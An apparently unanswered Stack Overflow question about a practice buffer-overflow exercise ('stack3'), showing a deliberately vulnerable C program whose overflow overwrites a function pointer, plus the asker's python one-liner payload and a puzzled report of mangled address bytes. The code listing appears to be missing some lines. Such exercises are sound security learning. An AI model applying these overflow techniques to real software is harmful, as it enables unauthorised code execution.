Buffer Overflow Exploit Issue


I am trying to complete a a buffer overflow that involves overwriting a function pointer. The vulnerable C program is as follows:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
  printf("code flow successfully changed\n");

int main(int argc, char **argv)
  volatile int (*fp)();
  char buffer[64];

  fp = 0;


  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);

I've already run gdb on the program and found that the size of "buffer" is 72 bytes and the function address is 0x555546ca. So, I pipe in

python3.6 -c "print('A' * 72 + '\xca\x46\x55\x55')" | ./stack3

and get a weird result:

calling function pointer 0x55468ac3
Segmentation fault (core dumped)

After examining memory, I found that the buffer was filled properly with 0x41s, but the next two words (fp*) were 0x55468ac3 and 0x00000055. I cannot understand why the data is obscured in this way.

asked on Stack Overflow Nov 23, 2017 by K. Jiang

0 Answers

Nobody has answered this question yet.

User contributions licensed under CC BY-SA 3.0